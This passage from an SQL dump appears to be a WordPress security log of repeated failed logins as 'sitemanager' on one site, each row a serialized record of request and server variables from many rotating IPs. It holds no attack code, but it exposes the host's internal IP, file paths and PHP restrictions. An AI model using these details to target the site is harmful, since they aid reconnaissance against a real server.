00:00:00'),(94169,1,'a:2:{s:8:\"username\";s:11:\"sitemanager\";s:6:\"server\";a:36:{s:15:\"SERVER_SOFTWARE\";s:12:\"nginx/1.18.0\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:4:\"USER\";s:8:\"www-data\";s:4:\"HOME\";s:8:\"/var/www\";s:12:\"HTTP_REFERER\";s:17:\"http://gopalak.in\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:17:\"HTTP_CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:14:\"vi-VN,vi;q=0.9\";s:20:\"HTTP_ACCEPT_ENCODING\";s:10:\"gzip, zstd\";s:11:\"HTTP_ACCEPT\";s:74:\"text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8\";s:19:\"HTTP_CONTENT_LENGTH\";s:3:\"104\";s:15:\"HTTP_USER_AGENT\";s:111:\"Mozilla/5.0 (Windows NT 11.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36\";s:9:\"HTTP_HOST\";s:10:\"gopalak.in\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"SERVER_NAME\";s:23:\"s10333402.saturnwp.link\";s:11:\"SERVER_PORT\";s:2:\"80\";s:11:\"SERVER_ADDR\";s:13:\"172.31.35.131\";s:11:\"REMOTE_PORT\";s:5:\"41866\";s:11:\"REMOTE_ADDR\";s:14:\"31.214.174.194\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:13:\"DOCUMENT_ROOT\";s:34:\"/storage/v6964/gopalak/public_html\";s:12:\"DOCUMENT_URI\";s:13:\"/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:3:\"104\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:12:\"QUERY_STRING\";s:0:\"\";s:5:\"HTTPS\";s:2:\"on\";s:15:\"PHP_ADMIN_VALUE\";s:32:\"open_basedir=/storage/v6964:/tmp\";s:15:\"SCRIPT_FILENAME\";s:47:\"/storage/v6964/gopalak/public_html/wp-login.php\";s:9:\"FCGI_ROLE\";s:9:\"RESPONDER\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";d:1745519108.559849;s:12:\"REQUEST_TIME\";i:1745519108;}}','31.214.174.194',0,'2025-04-24 23:55:10','1970-01-01 00:00:00'),(94170,1,'a:2:{s:8:\"username\";s:11:\"sitemanager\";s:6:\"server\";a:36:{s:15:\"SERVER_SOFTWARE\";s:12:\"nginx/1.18.0\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:4:\"USER\";s:8:\"www-data\";s:4:\"HOME\";s:8:\"/var/www\";s:12:\"HTTP_REFERER\";s:17:\"http://gopalak.in\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:17:\"HTTP_CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:14:\"ko-KR,ko;q=0.9\";s:20:\"HTTP_ACCEPT_ENCODING\";s:23:\"gzip, br, deflate, zstd\";s:11:\"HTTP_ACCEPT\";s:85:\"text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.9\";s:19:\"HTTP_CONTENT_LENGTH\";s:3:\"104\";s:15:\"HTTP_USER_AGENT\";s:112:\"Mozilla/5.0 (Macintosh; Intel Mac OS X 14.5) AppleWebKit/618.3.5 (KHTML, like Gecko) Version/17.4 Safari/618.3.5\";s:9:\"HTTP_HOST\";s:10:\"gopalak.in\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"SERVER_NAME\";s:23:\"s10333402.saturnwp.link\";s:11:\"SERVER_PORT\";s:2:\"80\";s:11:\"SERVER_ADDR\";s:13:\"172.31.35.131\";s:11:\"REMOTE_PORT\";s:5:\"34070\";s:11:\"REMOTE_ADDR\";s:13:\"51.77.247.142\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:13:\"DOCUMENT_ROOT\";s:34:\"/storage/v6964/gopalak/public_html\";s:12:\"DOCUMENT_URI\";s:13:\"/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:3:\"104\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:12:\"QUERY_STRING\";s:0:\"\";s:5:\"HTTPS\";s:2:\"on\";s:15:\"PHP_ADMIN_VALUE\";s:32:\"open_basedir=/storage/v6964:/tmp\";s:15:\"SCRIPT_FILENAME\";s:47:\"/storage/v6964/gopalak/public_html/wp-login.php\";s:9:\"FCGI_ROLE\";s:9:\"RESPONDER\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";d:1745519489.63132;s:12:\"REQUEST_TIME\";i:1745519489;}}','51.77.247.142',0,'2025-04-25 00:01:31','1970-01-01 00:00:00'),(94171,1,'a:2:{s:8:\"username\";s:11:\"sitemanager\";s:6:\"server\";a:36:{s:15:\"SERVER_SOFTWARE\";s:12:\"nginx/1.18.0\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:4:\"USER\";s:8:\"www-data\";s:4:\"HOME\";s:8:\"/var/www\";s:12:\"HTTP_REFERER\";s:17:\"http://gopalak.in\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:17:\"HTTP_CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:14:\"he-IL,he;q=0.9\";s:20:\"HTTP_ACCEPT_ENCODING\";s:23:\"gzip, deflate, zstd, br\";s:11:\"HTTP_ACCEPT\";s:85:\"text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.9\";s:19:\"HTTP_CONTENT_LENGTH\";s:3:\"104\";s:15:\"HTTP_USER_AGENT\";s:135:\"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/115.0.5790.171 Safari/537.36 Edg/115.0.1901.203\";s:9:\"HTTP_HOST\";s:10:\"gopalak.in\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"SERVER_NAME\";s:23:\"s10333402.saturnwp.link\";s:11:\"SERVER_PORT\";s:2:\"80\";s:11:\"SERVER_ADDR\";s:13:\"172.31.35.131\";s:11:\"REMOTE_PORT\";s:5:\"53884\";s:11:\"REMOTE_ADDR\";s:14:\"31.214.174.194\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:13:\"DOCUMENT_ROOT\";s:34:\"/storage/v6964/gopalak/public_html\";s:12:\"DOCUMENT_URI\";s:13:\"/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:3:\"104\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:12:\"QUERY_STRING\";s:0:\"\";s:5:\"HTTPS\";s:2:\"on\";s:15:\"PHP_ADMIN_VALUE\";s:32:\"open_basedir=/storage/v6964:/tmp\";s:15:\"SCRIPT_FILENAME\";s:47:\"/storage/v6964/gopalak/public_html/wp-login.php\";s:9:\"FCGI_ROLE\";s:9:\"RESPONDER\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";d:1745519872.914263;s:12:\"REQUEST_TIME\";i:1745519872;}}','31.214.174.194',0,'2025-04-25 00:07:54','1970-01-01 00:00:00'),(94172,1,'a:2:{s:8:\"username\";s:11:\"sitemanager\";s:6:\"server\";a:36:{s:15:\"SERVER_SOFTWARE\";s:12:\"nginx/1.18.0\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:4:\"USER\";s:8:\"www-data\";s:4:\"HOME\";s:8:\"/var/www\";s:12:\"HTTP_REFERER\";s:17:\"http://gopalak.in\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:17:\"HTTP_CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:14:\"hu-HU,hu;q=0.9\";s:20:\"HTTP_ACCEPT_ENCODING\";s:23:\"gzip, deflate, br, zstd\";s:11:\"HTTP_ACCEPT\";s:85:\"text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.7\";s:19:\"HTTP_CONTENT_LENGTH\";s:3:\"105\";s:15:\"HTTP_USER_AGENT\";s:134:\"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/112.0.5615.138 Safari/537.36 Edg/112.0.1722.68\";s:9:\"HTTP_HOST\";s:10:\"gopalak.in\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"SERVER_NAME\";s:23:\"s10333402.saturnwp.link\";s:11:\"SERVER_PORT\";s:2:\"80\";s:11:\"SERVER_ADDR\";s:13:\"172.31.35.131\";s:11:\"REMOTE_PORT\";s:5:\"39080\";s:11:\"REMOTE_ADDR\";s:15:\"103.169.160.163\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:13:\"DOCUMENT_ROOT\";s:34:\"/storage/v6964/gopalak/public_html\";s:12:\"DOCUMENT_URI\";s:13:\"/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:3:\"105\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:12:\"QUERY_STRING\";s:0:\"\";s:5:\"HTTPS\";s:2:\"on\";s:15:\"PHP_ADMIN_VALUE\";s:32:\"open_basedir=/storage/v6964:/tmp\";s:15:\"SCRIPT_FILENAME\";s:47:\"/storage/v6964/gopalak/public_html/wp-login.php\";s:9:\"FCGI_ROLE\";s:9:\"RESPONDER\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";d:1745520253.4871709;s:12:\"REQUEST_TIME\";i:1745520253;}}','103.169.160.163',0,'2025-04-25 00:14:15','1970-01-01 00:00:00'),(94173,1,'a:2:{s:8:\"username\";s:11:\"sitemanager\";s:6:\"server\";a:36:{s:15:\"SERVER_SOFTWARE\";s:12:\"nginx/1.18.0\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:4:\"USER\";s:8:\"www-data\";s:4:\"HOME\";s:8:\"/var/www\";s:12:\"HTTP_REFERER\";s:17:\"http://gopalak.in\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:17:\"HTTP_CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:14:\"ar-SA,ar;q=0.9\";s:20:\"HTTP_ACCEPT_ENCODING\";s:17:\"gzip, br, deflate\";s:11:\"HTTP_ACCEPT\";s:63:\"text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.9\";s:19:\"HTTP_CONTENT_LENGTH\";s:3:\"105\";s:15:\"HTTP_USER_AGENT\";s:121:\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/113.0.5672.93 Safari/537.36\";s:9:\"HTTP_HOST\";s:10:\"gopalak.in\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"SERVER_NAME\";s:23:\"s10333402.saturnwp.link\";s:11:\"SERVER_PORT\";s:2:\"80\";s:11:\"SERVER_ADDR\";s:13:\"172.31.35.131\";s:11:\"REMOTE_PORT\";s:5:\"41636\";s:11:\"REMOTE_ADDR\";s:13:\"15.204.43.173\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:13:\"DOCUMENT_ROOT\";s:34:\"/storage/v6964/gopalak/public_html\";s:12:\"DOCUMENT_URI\";s:13:\"/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:3:\"105\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:12:\"QUERY_STRING\";s:0:\"\";s:5:\"HTTPS\";s:2:\"on\";s:15:\"PHP_ADMIN_VALUE\";s:32:\"open_basedir=/storage/v6964:/tmp\";s:15:\"SCRIPT_FILENAME\";s:47:\"/storage/v6964/gopalak/public_html/wp-login.php\";s:9:\"FCGI_ROLE\";s:9:\"RESPONDER\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";d:1745520633.9419439;s:12:\"REQUEST_TIME\";i:1745520633;}}','15.204.43.173',0,'2025-04-25 00:20:35','1970-01-01 00:00:00'),(94174,1,'a:2:{s:8:\"username\";s:11:\"sitemanager\";s:6:\"server\";a:36:{s:15:\"SERVER_SOFTWARE\";s:12:\"nginx/1.18.0\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:4:\"USER\";s:8:\"www-data\";s:4:\"HOME\";s:8:\"/var/www\";s:12:\"HTTP_REFERER\";s:17:\"http://gopalak.in\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:17:\"HTTP_CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:14:\"en-US,en;q=0.9\";s:20:\"HTTP_ACCEPT_ENCODING\";s:14:\"gzip, zstd, br\";s:11:\"HTTP_ACCEPT\";s:85:\"text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.7\";s:19:\"HTTP_CONTENT_LENGTH\";s:3:\"104\";s:15:\"HTTP_USER_AGENT\";s:121:\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/113.0.5672.93 Safari/537.36\";s:9:\"HTTP_HOST\";s:10:\"gopalak.in\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"SERVER_NAME\";s:23:\"s10333402.saturnwp.link\";s:11:\"SERVER_PORT\";s:2:\"80\";s:11:\"SERVER_ADDR\";s:13:\"172.31.35.131\";s:11:\"REMOTE_PORT\";s:5:\"44214\";s:11:\"REMOTE_ADDR\";s:14:\"185.104.44.165\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:13:\"DOCUMENT_ROOT\";s:34:\"/storage/v6964/gopalak/public_html\";s:12:\"DOCUMENT_URI\";s:13:\"/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:3:\"104\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:12:\"QUERY_STRING\";s:0:\"\";s:5:\"HTTPS\";s:2:\"on\";s:15:\"PHP_ADMIN_VALUE\";s:32:\"open_basedir=/storage/v6964:/tmp\";s:15:\"SCRIPT_FILENAME\";s:47:\"/storage/v6964/gopalak/public_html/wp-login.php\";s:9:\"FCGI_ROLE\";s:9:\"RESPONDER\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";d:1745521016.0642519;s:12:\"REQUEST_TIME\";i:1745521016;}}','185.104.44.165',0,'2025-04-25 00:26:57','1970-01-01 00:00:00'),(94175,1,'a:2:{s:8:\"username\";s:11:\"sitemanager\";s:6:\"server\";a:36:{s:15:\"SERVER_SOFTWARE\";s:12:\"nginx/1.18.0\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:4:\"USER\";s:8:\"www-data\";s:4:\"HOME\";s:8:\"/var/www\";s:12:\"HTTP_REFERER\";s:17:\"http://gopalak.in\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:17:\"HTTP_CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:14:\"tr-TR,tr;q=0.9\";s:20:\"HTTP_ACCEPT_ENCODING\";s:14:\"gzip, br, zstd\";s:11:\"HTTP_ACCEPT\";s:85:\"text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.9\";s:19:\"HTTP_CONTENT_LENGTH\";s:3:\"104\";s:15:\"HTTP_USER_AGENT\";s:125:\"Mozilla/5.0 (Windows NT 11.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36 Edg/126.0.0.0\";s:9:\"HTTP_HOST\";s:10:\"gopalak.in\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"SERVER_NAME\";s:23:\"s10333402.saturnwp.link\";s:11:\"SERVER_PORT\";s:2:\"80\";s:11:\"SERVER_ADDR\";s:13:\"172.31.35.131\";s:11:\"REMOTE_PORT\";s:5:\"37724\";s:11:\"REMOTE_ADDR\";s:14:\"66.102.132.133\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:13:\"DOCUMENT_ROOT\";s:34:\"/storage/v6964/gopalak/public_html\";s:12:\"DOCUMENT_URI\";s:13:\"/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:3:\"104\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:12:\"QUERY_STRING\";s:0:\"\";s:5:\"HTTPS\";s:2:\"on\";s:15:\"PHP_ADMIN_VALUE\";s:32:\"open_basedir=/storage/v6964:/tmp\";s:15:\"SCRIPT_FILENAME\";s:47:\"/storage/v6964/gopalak/public_html/wp-login.php\";s:9:\"FCGI_ROLE\";s:9:\"RESPONDER\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";d:1745521393.704201;s:12:\"REQUEST_TIME\";i:1745521393;}}','66.102.132.133',0,'2025-04-25 00:33:15','1970-01-01 00:00:00'),(94176,1,'a:2:{s:8:\"username\";s:11:\"sitemanager\";s:6:\"server\";a:36:{s:15:\"SERVER_SOFTWARE\";s:12:\"nginx/1.18.0\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:4:\"USER\";s:8:\"www-data\";s:4:\"HOME\";s:8:\"/var/www\";s:12:\"HTTP_REFERER\";s:17:\"http://gopalak.in\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:17:\"HTTP_CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:14:\"pt-BR,pt;q=0.9\";s:20:\"HTTP_ACCEPT_ENCODING\";s:23:\"gzip, deflate, zstd, br\";s:11:\"HTTP_ACCEPT\";s:85:\"text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.9\";s:19:\"HTTP_CONTENT_LENGTH\";s:3:\"104\";s:15:\"HTTP_USER_AGENT\";s:80:\"Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:128.0) Gecko/20100101 Firefox/128.0\";s:9:\"HTTP_HOST\";s:10:\"gopalak.in\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"SERVER_NAME\";s:23:\"s10333402.saturnwp.link\";s:11:\"SERVER_PORT\";s:2:\"80\";s:11:\"SERVER_ADDR\";s:13:\"172.31.35.131\";s:11:\"REMOTE_PORT\";s:5:\"56770\";s:11:\"REMOTE_ADDR\";s:12:\"23.239.27.53\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:13:\"DOCUMENT_ROOT\";s:34:\"/storage/v6964/gopalak/public_html\";s:12:\"DOCUMENT_URI\";s:13:\"/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:3:\"104\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:12:\"QUERY_STRING\";s:0:\"\";s:5:\"HTTPS\";s:2:\"on\";s:15:\"PHP_ADMIN_VALUE\";s:32:\"open_basedir=/storage/v6964:/tmp\";s:15:\"SCRIPT_FILENAME\";s:47:\"/storage/v6964/gopalak/public_html/wp-login.php\";s:9:\"FCGI_ROLE\";s:9:\"RESPONDER\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";d:1745521771.423121;s:12:\"REQUEST_TIME\";i:1745521771;}}','23.239.27.53',0,'2025-04-25 00:39:33','1970-01-01 00:00:00'),(94177,1,'a:2:{s:8:\"username\";s:11:\"sitemanager\";s:6:\"server\";a:36:{s:15:\"SERVER_SOFTWARE\";s:12:\"nginx/1.18.0\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:4:\"USER\";s:8:\"www-data\";s:4:\"HOME\";s:8:\"/var/www\";s:12:\"HTTP_REFERER\";s:17:\"http://gopalak.in\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:17:\"HTTP_CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:14:\"de-DE,de;q=0.9\";s:20:\"HTTP_ACCEPT_ENCODING\";s:14:\"gzip, br, zstd\";s:11:\"HTTP_ACCEPT\";s:74:\"text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.9\";s:19:\"HTTP_CONTENT_LENGTH\";s:3:\"104\";s:15:\"HTTP_USER_AGENT\";s:86:\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7; rv:129.0) Gecko/20100101 Firefox/129.0\";s:9:\"HTTP_HOST\";s:10:\"gopalak.in\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"SERVER_NAME\";s:23:\"s10333402.saturnwp.link\";s:11:\"SERVER_PORT\";s:2:\"80\";s:11:\"SERVER_ADDR\";s:13:\"172.31.35.131\";s:11:\"REMOTE_PORT\";s:5:\"39030\";s:11:\"REMOTE_ADDR\";s:13:\"78.128.76.202\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:13:\"DOCUMENT_ROOT\";s:34:\"/storage/v6964/gopalak/public_html\";s:12:\"DOCUMENT_URI\";s:13:\"/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:3:\"104\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:12:\"QUERY_STRING\";s:0:\"\";s:5:\"HTTPS\";s:2:\"on\";s:15:\"PHP_ADMIN_VALUE\";s:32:\"open_basedir=/storage/v6964:/tmp\";s:15:\"SCRIPT_FILENAME\";s:47:\"/storage/v6964/gopalak/public_html/wp-login.php\";s:9:\"FCGI_ROLE\";s:9:\"RESPONDER\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";d:1745522149.3687911;s:12:\"REQUEST_TIME\";i:1745522149;}}','78.128.76.202',0,'2025-04-25 00:45:51','1970-01-01 00:00:00'),(94178,1,'a:2:{s:8:\"username\";s:11:\"sitemanager\";s:6:\"server\";a:36:{s:15:\"SERVER_SOFTWARE\";s:12:\"nginx/1.18.0\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:4:\"USER\";s:8:\"www-data\";s:4:\"HOME\";s:8:\"/var/www\";s:12:\"HTTP_REFERER\";s:17:\"http://gopalak.in\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:17:\"HTTP_CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:14:\"he-IL,he;q=0.9\";s:20:\"HTTP_ACCEPT_ENCODING\";s:19:\"gzip, zstd, deflate\";s:11:\"HTTP_ACCEPT\";s:63:\"text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.9\";s:19:\"HTTP_CONTENT_LENGTH\";s:3:\"106\";s:15:\"HTTP_USER_AGENT\";s:118:\"Mozilla/5.0 (Macintosh; Intel Mac OS X 14_4_1) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.3.1 Safari/605.1.15\";s:9:\"HTTP_HOST\";s:10:\"gopalak.in\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"SERVER_NAME\";s:23:\"s10333402.saturnwp.link\";s:11:\"SERVER_PORT\";s:2:\"80\";s:11:\"SERVER_ADDR\";s:13:\"172.31.35.131\";s:11:\"REMOTE_PORT\";s:5:\"45966\";s:11:\"REMOTE_ADDR\";s:12:\"51.75.55.211\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:13:\"DOCUMENT_ROOT\";s:34:\"/storage/v6964/gopalak/public_html\";s:12:\"DOCUMENT_URI\";s:13:\"/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:3:\"106\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:12:\"QUERY_STRING\";s:0:\"\";s:5:\"HTTPS\";s:2:\"on\";s:15:\"PHP_ADMIN_VALUE\";s:32:\"open_basedir=/storage/v6964:/tmp\";s:15:\"SCRIPT_FILENAME\";s:47:\"/storage/v6964/gopalak/public_html/wp-login.php\";s:9:\"FCGI_ROLE\";s:9:\"RESPONDER\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";d:1745522527.3715611;s:12:\"REQUEST_TIME\";i:1745522527;}}','51.75.55.211',0,'2025-04-25 00:52:14','1970-01-01 00:00:00'),(94179,1,'a:2:{s:8:\"username\";s:11:\"sitemanager\";s:6:\"server\";a:36:{s:15:\"SERVER_SOFTWARE\";s:12:\"nginx/1.18.0\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:4:\"USER\";s:8:\"www-data\";s:4:\"HOME\";s:8:\"/var/www\";s:12:\"HTTP_REFERER\";s:17:\"http://gopalak.in\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:17:\"HTTP_CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:14:\"ko-KR,ko;q=0.9\";s:20:\"HTTP_ACCEPT_ENCODING\";s:8:\"gzip, br\";s:11:\"HTTP_ACCEPT\";s:85:\"text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8\";s:19:\"HTTP_CONTENT_LENGTH\";s:3:\"103\";s:15:\"HTTP_USER_AGENT\";s:116:\"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/115.0.5790.102 